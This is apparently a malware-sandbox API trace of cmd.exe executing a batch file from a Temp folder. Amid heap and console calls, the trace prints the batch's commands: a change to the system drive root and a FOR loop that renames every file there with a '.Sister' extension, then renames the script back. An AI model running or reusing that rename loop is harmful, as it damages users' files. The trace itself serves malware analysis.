_get_osfhandle (_FileHandle=1) returned 0x50 [0098.715] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0098.716] _get_osfhandle (_FileHandle=0) returned 0x4c [0098.716] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0098.716] SetConsoleInputExeNameW () returned 0x1 [0098.716] GetConsoleOutputCP () returned 0x1b5 [0098.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0098.716] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.717] ??_V@YAXPEAX@Z () returned 0x1 [0098.717] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0098.717] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0098.717] _get_osfhandle (_FileHandle=3) returned 0x98 [0098.717] SetFilePointer (in: hFile=0x98, lDistanceToMove=16, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10 [0098.717] GetProcessHeap () returned 0x21ed8c70000 [0098.717] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b300) returned 1 [0098.717] GetProcessHeap () returned 0x21ed8c70000 [0098.718] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b340) returned 1 [0098.718] GetProcessHeap () returned 0x21ed8c70000 [0098.718] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c380) returned 1 [0098.718] _get_osfhandle (_FileHandle=3) returned 0x98 [0098.718] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10 [0098.718] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x4ed, lpOverlapped=0x0) returned 1 [0098.718] SetFilePointer (in: hFile=0x98, lDistanceToMove=18, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12 [0098.718] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nM\r\nt /0\r\n") returned 2 [0098.718] _get_osfhandle (_FileHandle=3) returned 0x98 [0098.718] GetFileType (hFile=0x98) returned 0x1 [0098.718] _get_osfhandle (_FileHandle=3) returned 0x98 [0098.718] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12 [0098.718] GetProcessHeap () returned 0x21ed8c70000 [0098.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c95430 [0098.718] GetProcessHeap () returned 0x21ed8c70000 [0098.718] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95430) returned 1 [0098.719] _tell (_FileHandle=3) returned 18 [0098.719] _close (_FileHandle=3) returned 0 [0098.719] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0098.719] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0098.719] _get_osfhandle (_FileHandle=3) returned 0x98 [0098.719] SetFilePointer (in: hFile=0x98, lDistanceToMove=18, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12 [0098.719] _get_osfhandle (_FileHandle=3) returned 0x98 [0098.719] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12 [0098.719] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x4eb, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointer (in: hFile=0x98, lDistanceToMove=37, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25 [0098.720] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=19, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="cd %SystemDrive%\\\r\n") returned 19 [0098.720] _get_osfhandle (_FileHandle=3) returned 0x98 [0098.720] GetFileType (hFile=0x98) returned 0x1 [0098.720] _get_osfhandle (_FileHandle=3) returned 0x98 [0098.720] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25 [0098.720] GetProcessHeap () returned 0x21ed8c70000 [0098.720] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c95430 [0098.720] GetProcessHeap () returned 0x21ed8c70000 [0098.720] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4010) returned 0x21ed8c99450 [0098.773] GetProcessHeap () returned 0x21ed8c70000 [0098.773] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8c774f0 [0098.773] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:") returned 0x2 [0098.773] GetProcessHeap () returned 0x21ed8c70000 [0098.773] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c774f0) returned 1 [0098.773] GetProcessHeap () returned 0x21ed8c70000 [0098.773] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c99450) returned 1 [0098.773] GetProcessHeap () returned 0x21ed8c70000 [0098.773] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95430) returned 1 [0098.775] _wcsicmp (_String1="cd", _String2=")") returned 58 [0098.775] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0098.775] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0098.775] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0098.775] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0098.775] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0098.775] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0098.775] GetProcessHeap () returned 0x21ed8c70000 [0098.775] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c7c380 [0098.775] GetProcessHeap () returned 0x21ed8c70000 [0098.775] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x16) returned 0x21ed8c7b300 [0098.775] GetProcessHeap () returned 0x21ed8c70000 [0098.775] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1a) returned 0x21ed8c774f0 [0098.776] _tell (_FileHandle=3) returned 37 [0098.776] _close (_FileHandle=3) returned 0 [0098.777] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0098.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.777] GetFileType (hFile=0x50) returned 0x2 [0098.777] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0098.777] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0098.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.781] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0098.783] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0098.783] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0098.783] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0098.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.783] GetFileType (hFile=0x50) returned 0x2 [0098.783] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0098.783] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0098.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.783] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x18) returned 1 [0098.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.784] GetFileType (hFile=0x50) returned 0x2 [0098.784] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0098.784] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0098.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.784] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c7b310*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8c7b310*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0098.785] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" C:\\ ") returned 5 [0098.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.785] GetFileType (hFile=0x50) returned 0x2 [0098.785] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0098.785] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0098.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.785] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x5) returned 1 [0098.786] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0098.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.786] GetFileType (hFile=0x50) returned 0x2 [0098.786] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0098.786] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0098.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.786] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0098.787] malloc (_Size=0xffce) returned 0x21ed8e90940 [0098.787] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0098.787] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0098.787] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0098.787] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0098.787] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0098.787] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0098.787] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0098.787] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe760, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0098.788] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0098.788] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0098.788] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0098.789] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0098.790] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0098.790] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0098.790] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0098.790] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0098.790] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0098.790] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0098.790] ??_V@YAXPEAX@Z () returned 0x1 [0098.790] GetProcessHeap () returned 0x21ed8c70000 [0098.790] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8c77830 [0098.790] GetProcessHeap () returned 0x21ed8c70000 [0098.790] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c77830, Size=0x1a) returned 0x21ed8c77830 [0098.790] GetProcessHeap () returned 0x21ed8c70000 [0098.790] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c77830) returned 0x1a [0098.790] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.790] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0098.791] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0098.791] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.791] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed8eb0900, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fe2b0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fe2b0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0098.794] ??_V@YAXPEAX@Z () returned 0x1 [0098.794] GetProcessHeap () returned 0x21ed8c70000 [0098.794] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8c7c440 [0098.794] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0098.794] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0098.794] GetProcessHeap () returned 0x21ed8c70000 [0098.794] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8c7c470 [0098.794] GetProcessHeap () returned 0x21ed8c70000 [0098.795] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c470, Size=0x1a) returned 0x21ed8c7c470 [0098.795] GetProcessHeap () returned 0x21ed8c70000 [0098.795] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c470) returned 0x1a [0098.829] _wcsnicmp (_String1="C:", _String2="/D", _MaxCount=0x2) returned 52 [0098.829] malloc (_Size=0xffce) returned 0x21ed8ec08e0 [0098.829] ??_V@YAXPEAX@Z () returned 0x21ed8ec08e0 [0098.830] GetProcessHeap () returned 0x21ed8c70000 [0098.830] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c7b100 [0098.830] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8ec08e0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0098.830] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x7fe7, lpBuffer=0x21ed8ec08e0, lpFilePart=0xa6cf4fdfe0 | out: lpBuffer="C:\\", lpFilePart=0xa6cf4fdfe0*=0x0) returned 0x3 [0098.830] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0099.010] FindFirstFileW (in: lpFileName="C:\\", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0099.011] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0099.011] SetCurrentDirectoryW (lpPathName="C:\\" (normalized: "c:")) returned 1 [0099.011] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\") returned 1 [0099.011] GetProcessHeap () returned 0x21ed8c70000 [0099.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c75c30) returned 1 [0099.011] GetEnvironmentStringsW () returned 0x21ed8c75c30* [0099.011] GetProcessHeap () returned 0x21ed8c70000 [0099.011] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaf2) returned 0x21ed8c95430 [0099.011] FreeEnvironmentStringsA (penv="=") returned 1 [0099.011] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\") returned 0x3 [0099.011] GetProcessHeap () returned 0x21ed8c70000 [0099.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b100) returned 1 [0099.011] ??_V@YAXPEAX@Z () returned 0x1 [0099.012] ??_V@YAXPEAX@Z () returned 0x1 [0099.012] ??_V@YAXPEAX@Z () returned 0x1 [0099.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.014] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0099.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.044] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0099.048] _get_osfhandle (_FileHandle=0) returned 0x4c [0099.048] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0099.053] SetConsoleInputExeNameW () returned 0x1 [0099.053] GetConsoleOutputCP () returned 0x1b5 [0099.080] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0099.080] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.081] ??_V@YAXPEAX@Z () returned 0x1 [0099.083] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0099.083] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0099.083] _get_osfhandle (_FileHandle=3) returned 0x3c [0099.083] SetFilePointer (in: hFile=0x3c, lDistanceToMove=37, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25 [0099.083] GetProcessHeap () returned 0x21ed8c70000 [0099.083] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c470) returned 1 [0099.083] GetProcessHeap () returned 0x21ed8c70000 [0099.083] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c440) returned 1 [0099.083] GetProcessHeap () returned 0x21ed8c70000 [0099.083] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c77830) returned 1 [0099.083] GetProcessHeap () returned 0x21ed8c70000 [0099.083] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c774f0) returned 1 [0099.083] GetProcessHeap () returned 0x21ed8c70000 [0099.083] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b300) returned 1 [0099.083] GetProcessHeap () returned 0x21ed8c70000 [0099.083] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c380) returned 1 [0099.083] _get_osfhandle (_FileHandle=3) returned 0x3c [0099.083] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25 [0099.084] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x4d8, lpOverlapped=0x0) returned 1 [0099.084] SetFilePointer (in: hFile=0x3c, lDistanceToMove=39, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x27 [0099.084] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\n %SystemDrive%\\\r\n") returned 2 [0099.084] _get_osfhandle (_FileHandle=3) returned 0x3c [0099.084] GetFileType (hFile=0x3c) returned 0x1 [0099.084] _get_osfhandle (_FileHandle=3) returned 0x3c [0099.084] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x27 [0099.084] GetProcessHeap () returned 0x21ed8c70000 [0099.084] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c95f30 [0099.084] GetProcessHeap () returned 0x21ed8c70000 [0099.084] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95f30) returned 1 [0099.085] _tell (_FileHandle=3) returned 39 [0099.085] _close (_FileHandle=3) returned 0 [0099.085] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0099.085] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0099.085] _get_osfhandle (_FileHandle=3) returned 0x3c [0099.085] SetFilePointer (in: hFile=0x3c, lDistanceToMove=39, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x27 [0099.085] _get_osfhandle (_FileHandle=3) returned 0x3c [0099.085] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x27 [0099.085] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x4d6, lpOverlapped=0x0) returned 1 [0099.085] SetFilePointer (in: hFile=0x3c, lDistanceToMove=131, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x83 [0099.085] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=92, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 92 [0099.085] _get_osfhandle (_FileHandle=3) returned 0x3c [0099.085] GetFileType (hFile=0x3c) returned 0x1 [0099.085] _get_osfhandle (_FileHandle=3) returned 0x3c [0099.085] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x83 [0099.086] GetProcessHeap () returned 0x21ed8c70000 [0099.086] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c95f30 [0099.086] GetProcessHeap () returned 0x21ed8c70000 [0099.086] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95f30) returned 1 [0099.086] _wcsicmp (_String1="for", _String2=")") returned 61 [0099.086] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0099.087] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0099.087] GetProcessHeap () returned 0x21ed8c70000 [0099.087] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c72720 [0099.087] GetProcessHeap () returned 0x21ed8c70000 [0099.087] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c727e0 [0099.087] GetProcessHeap () returned 0x21ed8c70000 [0099.087] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8c774f0 [0099.087] GetProcessHeap () returned 0x21ed8c70000 [0099.087] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c774f0, Size=0x18) returned 0x21ed8c774f0 [0099.087] GetProcessHeap () returned 0x21ed8c70000 [0099.087] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c774f0) returned 0x18 [0099.087] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0099.087] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0099.087] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0099.087] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0099.087] _wcsicmp (_String1="IN", _String2="in") returned 0 [0099.088] GetProcessHeap () returned 0x21ed8c70000 [0099.088] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c7b340 [0099.088] _wcsicmp (_String1="DO", _String2="do") returned 0 [0099.089] _wcsicmp (_String1="ren", _String2=")") returned 73 [0099.089] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0099.089] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0099.089] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0099.089] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0099.089] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0099.089] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0099.089] GetProcessHeap () returned 0x21ed8c70000 [0099.089] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c72840 [0099.089] GetProcessHeap () returned 0x21ed8c70000 [0099.089] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 